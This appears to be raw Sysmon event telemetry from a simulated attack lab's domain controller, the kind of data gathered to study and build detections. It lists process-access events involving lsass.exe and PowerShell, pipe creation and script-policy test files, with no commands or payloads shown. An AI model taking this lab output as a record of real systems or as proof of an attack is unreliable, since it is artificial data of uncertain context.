AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.0.regtrans-msMD5=8A7F31E4FA3C8E2617498494A091D4CB,SHA256=95ED45DDDFF38BFFDB857D7CB682DC9CD866602DB4FE8BEFE28972D5A594DFC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.842{266CAFBE-642D-6064-8F02-00000000AD01}38684392C:\Windows\servicing\TrustedInstaller.exe{266CAFBE-642D-6064-9002-00000000AD01}4580C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.811{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.811{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:04.780{266CAFBE-6444-6064-ED02-00000000AD01}1660\PSHost.132616656047219879.1660.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0E00-00000000AD01}10962344C:\Windows\system32\LogonUI.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-0E00-00000000AD01}1096C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D5-6064-0900-00000000AD01}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D5-6064-0900-00000000AD01}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.780{266CAFBE-6444-6064-ED02-00000000AD01}1660ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jramhoqg.zkr.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.764{266CAFBE-6444-6064-ED02-00000000AD01}1660ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_knj3plyv.onz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.764{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_knj3plyv.onz.ps12021-03-31 12:00:04.764 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.748{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.733{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.733{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.733{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-6444-6064-EB02-00000000AD01}44364852C:\Windows\system32\conhost.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 